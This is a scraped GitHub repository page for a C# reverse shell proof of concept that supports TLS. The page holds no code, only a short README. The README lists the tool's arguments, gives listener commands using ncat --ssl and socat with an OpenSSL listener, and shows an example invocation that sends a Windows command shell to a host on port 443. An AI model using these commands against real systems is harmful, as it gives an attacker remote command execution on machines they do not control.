Skip to content

jermainlaforce/csharp_reverse_shell

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

csharp_reverse_shell

c# reverse shell poc that also does TLS

Specify host, port, command, arguments, int XOR

Catch it with ncat --ssl or socat openssl-listen:443,cert=cert.pem,verify=0

All arguments are required,

e.g > csharp_reverse_shell.exe host 443 %comspec% "" 00

About

c# reverse shell poc

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages

  • C# 100.0%